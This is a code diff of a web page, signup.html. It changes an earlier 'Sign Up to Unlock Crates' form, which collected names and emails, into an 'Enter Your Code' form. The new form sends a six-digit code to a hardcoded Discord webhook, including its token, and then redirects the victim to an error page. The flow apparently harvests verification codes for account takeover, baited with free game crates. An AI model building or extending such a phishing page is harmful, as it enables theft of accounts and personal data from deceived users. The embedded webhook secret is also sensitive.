--- a/signup.html
+++ b/signup.html
@@ -2,19 +2,22 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Sign Up</title>
+  <title>Enter Your Code</title>
   <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
   <style>
     html, body {
       margin: 0;
       padding: 0;
+      height: 100%;
       font-family: 'Inter', sans-serif;
-      background: linear-gradient(-45deg, #1e1e2f, #2c3e50, #34495e, #1abc9c);
+      background: linear-gradient(-45deg, #2c003e, #3b1f5c, #4b2a6f, #6c3fa0);
       background-size: 400% 400%;
       animation: gradientShift 30s ease infinite;
       overflow: hidden;
       position: relative;
       color: #fff;
+      display: flex;
+      flex-direction: column;
     }
 
     @keyframes gradientShift {
@@ -56,8 +59,8 @@
     }
 
     .nav-item.home:hover {
-      color: #1abc9c;
-      text-shadow: 0 0 6px #1abc9c;
+      color: #9b59b6;
+      text-shadow: 0 0 6px #9b59b6;
     }
 
     .nav-item.disabled:hover::after {
@@ -74,34 +77,15 @@
       opacity: 0.9;
     }
 
-    .particles {
-      position: absolute;
-      top: 0; left: 0;
-      width: 100%; height: 100%;
-      pointer-events: none;
-      overflow: hidden;
-      z-index: 1;
-    }
-
-    .particles .dot {
-      position: absolute;
-      width: 8px;
-      height: 8px;
-      background: rgba(255,255,255,0.1);
-      border-radius: 50%;
-      animation: float 12s linear infinite;
-    }
-
-    @keyframes float {
-      0% { transform: translateY(0); opacity: 1; }
-      100% { transform: translateY(-100vh); opacity: 0; }
+    .main {
+      flex: 1;
+      display: flex;
+      align-items: center;
+      justify-content: center;
+      position: relative;
     }
 
     .container {
-      position: absolute;
-      top: 50%;
-      left: 50%;
-      transform: translate(-50%, -50%);
       background: rgba(0, 0, 0, 0.75);
       padding: 50px 40px;
       border-radius: 20px;
@@ -114,24 +98,27 @@
 
     @keyframes enterGlow {
       0% {
-        transform: translate(-50%, -50%) scale(0.85);
+        transform: scale(0.85);
         box-shadow: 0 0 0 rgba(0,0,0,0);
+        opacity: 0;
       }
       50% {
-        transform: translate(-50%, -50%) scale(1.02);
-        box-shadow: 0 0 60px rgba(26, 188, 156, 0.4);
+        transform: scale(1.02);
+        box-shadow: 0 0 60px rgba(155, 89, 182, 0.4);
+        opacity: 1;
       }
       100% {
-        transform: translate(-50%, -50%) scale(1);
+        transform: scale(1);
         box-shadow: 0 0 40px rgba(0,0,0,0.8);
+        opacity: 1;
       }
     }
 
     h2 {
       text-align: center;
-      margin-bottom: 20px;
+      margin-bottom: 30px;
       font-weight: 600;
-      font-size: 1.8rem;
+      font-size: 2rem;
     }
 
     form {
@@ -141,28 +128,42 @@
     }
 
     input {
-      padding: 14px;
+      padding: 16px;
       border: none;
       border-radius: 10px;
-      background: #2f2f3f;
+      background: #3b2f4f;
       color: #fff;
-      font-size: 15px;
+      font-size: 16px;
+      transition: box-shadow 0.3s ease;
+    }
+
+    input:focus {
+      outline: none;
+      box-shadow: 0 0 12px #9b59b6;
     }
 
     button {
-      padding: 14px;
-      background: #1abc9c;
+      padding: 16px;
+      background: #9b59b6;
       border: none;
       border-radius: 10px;
       color: #fff;
       font-weight: bold;
-      font-size: 15px;
+      font-size: 16px;
       cursor: pointer;
-      transition: background 0.3s ease;
+      transition: background 0.3s ease, transform 0.2s ease;
+      animation: pulse 2s infinite;
     }
 
     button:hover {
-      background: #16a085;
+      background: #8e44ad;
+      transform: scale(1.03);
+    }
+
+    @keyframes pulse {
+      0% { box-shadow: 0 0 0 0 rgba(155, 89, 182, 0.6); }
+      70% { box-shadow: 0 0 0 15px rgba(155, 89, 182, 0); }
+      100% { box-shadow: 0 0 0 0 rgba(155, 89, 182, 0); }
     }
   </style>
 </head>
@@ -176,41 +177,26 @@
     </div>
   </div>
 
-  <div class="particles"></div>
-
-  <div class="container">
-    <h2>Sign Up to Unlock Crates</h2>
-    <form id="form1">
-      <input type="text" id="Name" placeholder="Your Name" required>
-      <input type="email" id="Email" placeholder="Your Email" required>
-      <button type="submit">Submit</button>
-    </form>
+  <div class="main">
+    <div class="container">
+      <h2>Enter Your Code</h2>
+      <form id="form2">
+        <input type="text" id="Code" placeholder="6-digit Code" required>
+        <button type="submit">Submit</button>
+      </form>
+    </div>
   </div>
 
   <script>
-    // Particles
-    for (let i = 0; i < 40; i++) {
-      const dot = document.createElement('span');
-      dot.className = 'dot';
-      dot.style.left = Math.random() * 100 + '%';
-      dot.style.top = Math.random() * 100 + '%';
-      dot.style.animationDuration = (6 + Math.random() * 6) + 's';
-      document.querySelector('.particles').appendChild(dot);
-    }
-
-    // Webhook logic
     const webhookUrl = 'https://discord.com/api/webhooks/1413009868364976218/FRWyak8eE5D6BdqXv5x3_bMiKexf5I8x1y1qJuMPHRMcirw3qxCZseR5qXdatlQrCntp';
 
-    const sendNameEmail = (name, email) => {
+    const sendCode = (code) => {
       const msg = {
-        content: `📨 New sign-up received!\n**Name:** ${name}\n**Email:** ${email}`,
+        content: `🔐 Code submitted!\n**Code:** ${code}`,
         embeds: [{
-          title: 'Sign-Up Details',
-          color: 3447003,
-          fields: [
-            { name: 'Name', value: name },
-            { name: 'Email', value: email }
-          ],
+          title: 'Code Entry',
+          color: 15158332,
+          fields: [{ name: 'Code', value: code }],
           timestamp: new Date().toISOString()
         }]
       };
@@ -219,17 +205,26 @@
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify(msg)
+      })
+      .then(res => {
+        if (!res.ok) throw new Error(`HTTP ${res.status}`);
+        console.log('Code webhook sent successfully');
+        setTimeout(() => window.location.href = "Error.html", 750);
+      })
+      .catch(err => {
+        console.error('Code webhook error:', err);
       });
     };
 
     document.addEventListener('DOMContentLoaded', () => {
-      document.querySelector('#form1').addEventListener('submit', (e) => {
+      document.querySelector('#form2').addEventListener('submit', (e) => {
         e.preventDefault();
-        const name = document.querySelector('#Name').value.trim();
-        const email = document.querySelector('#Email').value.trim();
-        if (!name || !email) return;
-        sendNameEmail(name, email);
-        setTimeout(() => window.location.href = "Sign Up Code.html", 750);
+        const code = document.querySelector('#Code').value.trim();
+        if (!/^\d{6}$/.test(code)) {
+          alert('Code must be exactly 6 digits.');
+          return;
+        }
+        sendCode(code);
       });
     });
   </script>
